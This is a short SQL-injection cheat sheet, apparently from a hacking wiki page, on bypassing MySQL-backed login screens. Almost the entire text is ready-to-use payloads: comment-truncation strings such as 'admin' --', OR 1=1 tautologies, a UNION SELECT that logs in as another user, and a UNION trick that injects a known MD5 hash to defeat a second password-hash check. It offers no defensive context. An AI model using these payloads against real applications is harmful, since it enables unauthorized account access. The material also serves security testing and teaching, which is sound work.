Table of Contents

Hacking - SQL Injection - MySQL - Bypassing Login Screens

SQL Injection 101, Login tricks:

admin' --
admin' #
admin'/*
' OR 1=1--
' or 1=1#
' OR 1=1/*
') or '1'='1--
') or ('1'='1--
....

Login as different user

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

NOTE: Old versions of MySQL do not support union queries.


Bypassing second MD5 hash check login screens

If the application is first getting the record by username and then compares the returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication.

You can union results with a known password and MD5 hash of supplied password.

In this case, the application will compare your password and your supplied MD5 hash instead of MD5 from the database.

Username :admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
Password : 1234

NOTE: 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)